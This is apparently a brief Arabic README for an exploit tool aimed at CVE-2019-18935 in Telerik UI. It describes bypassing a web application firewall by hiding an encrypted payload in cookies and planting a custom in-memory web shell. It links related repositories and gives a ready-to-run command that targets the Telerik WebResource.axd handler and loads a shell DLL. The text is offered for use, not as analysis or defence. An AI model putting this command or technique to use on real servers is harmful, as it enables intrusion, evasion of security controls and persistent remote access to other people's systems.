
استغلال ثغرة CVE-2019-18935 (Telerik UI) مع تجاوز WAF عبر حقن حمولة مشفرة في الكوكيز ونشر شل ذاكرة مخصص.
تعديل المشروع الأصلي: https://github.com/noperator/CVE-2019-18935
إذا كنت ترغب في استخدام منطق حصان الذاكرة الخاص بك، يمكنك الرجوع إلى هذا المشروع:
https://github.com/dust-life/CVE-2019-18935-memShell
الأمر المستخدم: python CVE-2019-18935.py -v xxxx -u https://xxxxxx/Telerik.Web.UI.WebResource.axd -f c:\users\public -p gmemShell.dll
يشير الشكل أدناه عادةً إلى نجاح الاستغلال
